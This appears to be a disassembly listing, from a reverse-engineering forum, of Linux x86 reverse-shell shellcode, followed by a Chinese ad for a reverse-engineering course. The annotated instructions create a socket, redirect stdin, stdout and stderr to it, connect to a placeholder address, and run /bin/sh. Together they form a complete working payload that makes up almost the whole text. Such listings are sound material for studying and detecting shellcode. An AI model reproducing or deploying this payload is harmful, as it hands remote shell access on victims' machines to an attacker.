LOAD:08048054 public start
LOAD:08048054 start:
LOAD:08048054 xor ebx, ebx
LOAD:08048056 mul ebx
LOAD:08048058 push ebx
LOAD:08048059 inc ebx ; SOCKOP_socket
LOAD:0804805A create a new socket
LOAD:0804805A push ebx
LOAD:0804805B push 2
LOAD:0804805D mov ecx, esp
LOAD:0804805F mov al, SYS_socketcall ; sys_socketcall
LOAD:08048061 int 80h ; LINUX -
LOAD:08048063 redirect stdin(0)、stdout(1)、stderr(2) to new socket
LOAD:08048063 xchg eax, ebx
LOAD:08048064 pop ecx
LOAD:08048065 loc_8048065: ; CODE XREF: LOAD:0804806Aj
LOAD:08048065 mov al, SYS_dup2 ; sys_dup2
LOAD:08048067 int 80h ; LINUX -
LOAD:08048069 dec ecx
LOAD:0804806A jns short loc_8048065 ; sys_dup2
LOAD:0804806C sock_connect(int fd, struct sockaddr *uservaddr, int addrlen)
LOAD:0804806C push xxxxxxxxh ; struct sockaddr<sin_family, sin_port, sin_addr>
LOAD:08048071 push xxxxxxxxh
LOAD:08048076 mov ecx, esp
LOAD:08048078 mov al, SYS_socketcall
LOAD:0804807A push eax
LOAD:0804807B push ecx
LOAD:0804807C push ebx ; fd
LOAD:0804807D mov bl, 3
LOAD:0804807F mov ecx, esp
LOAD:08048081 int 80h ; LINUX -
LOAD:08048083 execute /bin/sh
LOAD:08048083 push edx
LOAD:08048084 push 'hs//'
LOAD:08048089 push 'nib/' ; /bin/sh
LOAD:0804808E mov ebx, esp
LOAD:08048090 push edx
LOAD:08048091 push ebx
LOAD:08048092 mov ecx, esp
LOAD:08048094 mov al, 0Bh ; sys_execve
LOAD:08048096 int 80h ; LINUX -
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)